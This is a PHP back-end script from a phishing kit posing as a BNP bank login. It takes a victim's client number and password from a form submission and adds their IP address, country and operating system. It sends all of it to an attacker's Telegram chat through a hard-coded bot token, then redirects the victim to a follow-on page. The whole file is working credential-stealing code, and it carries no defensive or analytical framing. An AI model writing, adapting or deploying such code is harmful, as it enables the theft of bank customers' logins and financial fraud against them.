<?php

session_start();
include_once 'functions.php';

	
$message = '[🆘] +1 LOG BNP [🆘]' . "\r\n\n";

$message .= '📢NUMERO CLIENT  : ' . $_POST['username'] . "\r\n\n";
$message .= '📢PASSWORD  : ' . $_POST['password'] . "\r\n\n";

$message .= '[🤖] TIERS [🤖]' . "\r\n\n";

$message .= '🤖 IP : ' . get_user_ip() . "\r\n";
$message .= '🤖 Pays : ' . get_user_country() . "\r\n";
$message .= '🤖 Systeme : ' . get_user_os() . "\r\n";



$url = "https://api.telegram.org/bot8260663673:AAGD2NsNgjmAbtQLcSeAyGZQcYX2Kv7LT9s" . $token . "/sendMessage?chat_id=6983836117" . $chat_id . "&text=" . urlencode($message);

file_get_contents($url);

// Utilisation de JavaScript pour la redirection
echo '<script type="text/javascript">';
echo 'window.location.href = "../../recap.php";';
echo '</script>';

?>